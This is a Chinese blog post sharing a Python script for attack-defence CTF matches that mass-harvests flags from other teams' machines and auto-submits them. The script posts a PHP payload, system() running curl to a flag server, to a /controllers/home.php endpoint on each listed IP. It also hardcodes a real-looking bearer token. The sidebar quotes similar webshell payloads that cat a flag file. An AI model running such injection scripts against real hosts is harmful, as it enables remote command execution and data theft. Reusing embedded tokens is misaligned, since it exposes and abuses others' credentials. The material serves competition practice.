通过python脚本集体获取CTF中的flag并且提交

于 2023-10-25 09:05:25 发布
阅读量589 收藏 2
点赞数 5
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lwj173920/article/details/134026365
版权 
先在python中获取库requests
# _*_ coding:utf-8 _*_
import requests, re

# 从网址(网址自己可以随便在网上获取) https://cloud.dasctf.com/375/competePage/530 可知 match_id=375
MATCH_ID = "945"
# 登录后通过抓取请求包可得 authorization 认证字段值
authorization = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC91c2VyXC9yYW5nZS11c2VyXC9hcGlcL2lubmVyXC9hdXRoIiwiaWF0IjoxNjk3MjY1OTMyLCJleHAiOjE2OTc0ODM2MjgsIm5iZiI6MTY5NzI2NzYyOCwianRpIjoiN0pOZnV2OFI1WnFCbU9DcCIsInN1YiI6NzE1OTQsInBydiI6IjM3YjdjNTBiMjUwNDFhNGMyMGZlNDdjMjQyZTFiZmQwZjYzMDkyYzUiLCJzbGFiLW1hdGNoXzk0NSI6NzE1OTQsImxvZ2luX3Rva2VuIjoiN2Q5MDkzYmUxYjBhMGJmN2JkNDY0NDNiODhjNGQ4NmIiLCJndWFyZCI6InBsYXllciIsInVzZXJuYW1lIjoibnBjIn0.gdJaEMkrzCRDPWZ2V2TbvpQGT6mHujj38_S-TailSzQ"
# 获取 flag 命令
# 118.24.11.89 为比赛平台获取flag的Server地址
# token中的10121为比赛平台自己的id
cmd = 'curl 118.24.11.89/index.php?token=10121_USR-20231014-LF5xe'
# 上述 token 中可知 exerciseId 为 10121
try:
    exerciseId = re.findall(r'token=(.*?)_USR', cmd)[0]
    print(exerciseId)
except:
    print('exerciseId error!')
    exit(0)

# ip 列表,可排除掉自身
# 数组中为比赛平台中所有队伍的ip地址
ip_list = ["集体所有队伍的IP地址"]

def main():
    print("正在获取靶机的flag:")
    flag_list = exp(ip_list)
    get_flag(flag_list)

def exp(ip_list):
    flag_list = []
    for ip in ip_list:
        url = f"http://{ip}/controllers/home.php"
        data = {"x": f"system('{cmd}');"}
        try:
            r = requests.post(url, data=data, timeout=3)
        except:
            continue
        print(f'ip={ip}\tres={r.text[:32]}')
        flag_list.append(r.text)
    return flag_list

def get_flag(flag_list):
    header = {
        "matchId": MATCH_ID,
        "authorization": authorization,
        "Content-Type": "application/json;charset=UTF-8"
    }
    for flag in flag_list:
        url = "https://cloud.dasctf.com/slab-match/api/v1/player/answer-panel/answer"
        data = {
            "matchId": MATCH_ID,
            "exerciseId": exerciseId,
            "flag": flag
        }
        r = requests.post(url, json=data, headers=header)
        print(r.text)

if __name__ == '__main__':
    # 输出格式为 ip=  res=a4a5f66b707ce55b9cf735b8b97bd716
    # ip为比赛中靶机的ip地址,res=后面的即为对应靶机的flag,在比赛平台找对应的靶机flag对话框提交即可
    main()
军先生@桂女士
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag提交指定平台python脚本,AWD比赛专用,可以自定义内容,批量提交等,确保速度
AWD自动提交flag脚本
05-14
【AWD自动提交flag脚本】是用于网络安全竞赛(如Capture The Flag,简称CTF的自动化工具,特别是在 Automated Web Defense(AWD)类型的比赛。这类脚本的主要目的是提高效率,减少手动操作,使得参赛者能够...
CTF之流量分析
shy的博客
06-05 2万+
CTF杂项存在一种题型——流量分析,主要是给你一个流量包,让你分析获取的flag的值。 有5种方式,可以直接查flag。 1、直接搜索 2、使用notepad++等软件,直接打开流量包,搜索关键字 3、编写python脚本 #encoding:utf-8 #用二进制方式读取文件 file=open("networking.pcap","rb") #读取文件内容 i=file.read() #查字段 a1=i.find("flag{") a2=i.find("}",a1) #将查
自动提交flag-python
weixin_43841336的博客
07-18 2814
import requests def get_flag(url): data = { ‘cmd’: ‘echo file_get_contents("/mydrivers/".scandir("/mydrivers/")[2]);’ } res = requests.post(url=“http://”+url+"/shell.php", data=data) return url,res.co...
ctf 常用python脚本及在线网站
volcano的博客
01-12 2987
脚本
ctfpython脚本获取flag
热门推荐
芥子
01-19 2万+
题目:GetFlag解题链接:http://106.75.26.211:2222访问链接页面显示如下:在页面提示captcha通过md5加密后的前六位是b8cda8,说明需要通过脚本来破解:脚本如下:运行结果:这里由于不知道登录用户和密码,想到用用SQL注入的万能密码尝试一下:admin' or '1'='1登录后页面显示如下:访问三个文件都需要下载:在a.php里面提示:提示访问根目录:查看源
CTF-WEB-Python脚本汇总
m0_74317362的博客
09-28 361
【代码】CTF-Python脚本汇总。
CTF密码学-Python古典密码加密解密脚本
04-30
CTF(Capture The Flag)是一种网络安全竞赛,其密码学挑战是常见的环节,要求参赛者解决各种加密和解密问题。在这个压缩包,我们有四个Python脚本,分别涉及摩斯密码、培根密码、ASCII编码和解码以及凯撒密码。...
CTF 离线C PHP python 汇编函数查询 chm电子书合集
10-06
Python以其简洁的语法和强大的功能,成为CTF竞赛常用的脚本语言,特别是在自动化任务和数据分析方面。Python函数查询手册将帮助你快速查询和应用Python库函数,解决各种CTF挑战。 5. **汇编语言函数查询**: 在...
频域盲水印python脚本(free)
最新发布
10-30
【频域盲水印python脚本(free)】 在信息技术领域,数字水印是一种用于保护知识产权和验证数据完整性的技术。它通常涉及在原始数据(如图像、音频或视频文件嵌入不可见的标记,这些标记在不显著影响媒体质量的...
AWD攻防读取flag的批量脚本
09-05
AWD攻防读取flag的批量脚本,可能需要自行修改下
Python-CTFWiki是一个免费开放且持续更新的知识整合站点
08-12
CTF Wiki是一个免费开放且持续更新的知识整合站点,你可以在这里学到关于CTF竞赛及网络安全相关的有趣知识,我们为你准备了CTF竞赛的基础知识、常见题型、解题思路以及常用工具等,帮助你更快速地了解CTF竞赛以及网络安全。
CTFPython脚本记录
Zeker62的博客
09-11 969
目录字典生成生成数字字典:包括规定起始、终止和步长生成固定位数的数字字典:比如四位1——0001功能实现循环zip解压缩:适用于压缩文件里面有压缩文件的情况提取文件里面的IP地址、去重复、nslookup查询十进制转ASCII:多个转换用","隔开将黑白图片生成01串并解密:来自攻防世界misc的gif截取两个字符、16进制转为10进制、ASCII编码——来自misc:掀桌子密码破解二进制生成摩...
CTF比赛使用Python通过Mysql漏洞获取FLAG
单核CPU的小朋友的博客
03-21 1263
#!/usr/bin/env python import MySQLdb def Mysql_Inject(ip,flag): db = MySQLdb.connect("127.0.0.1","root","123456","python") cursor = db.cursor() try: query = "insert into py values(\"%s\",\"%s\");"%(ip,flag) cursor.execute(query
awd-python批量拿flag,批量提交
weixin_46079186的博客
06-26 5798
代码仅供参考 import requests import re data = { '123':"system('cat+/home/ctf/flag');" # 一句话木马 } list = [] def shell(): for i in range(1,255): try: io = requests.get("http://192-168-1-" + str(i) + ".awd.bugku.cn/e/search/result/
获取管理员权限后,如何利用蚁剑得到flag
weixin_47346400的博客
09-14 2729
首先在rdctf部署一个地址 然后打开该界面并登录该网站的后门 mimawei:8618ahead (reverse) 在附件管理上传webshell.php文件并上传 然后打开该网站前台的文件
自动提交flag脚本
山兔的博客
09-19 1528
import requests #url 目标 #flag_url 提交flag的url curl flag_curl #method 木马提交方式 #passwd 木马密码 #flag_path 后门的路径 例如:shell.php webshell.php def get_flag(url,flag_url,method,passwd,flag_path): # url=192.168.0.0 flag_path=shell.php url = 192.1
使用php运行python文件
json_li的博客
06-09 746
可以使用PHP的exec函数来运行Python文件
Python实现MS17-010漏洞利用脚本解析
"这篇资源是关于网络攻防的,特别是针对MS17-010漏洞的Python脚本,适用于网络安全应急演练和CTF比赛。脚本的主要功能是利用永恒之蓝漏洞对目标主机进行攻击,同时展示了如何利用Metasploit框架创建和执行攻击模块。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值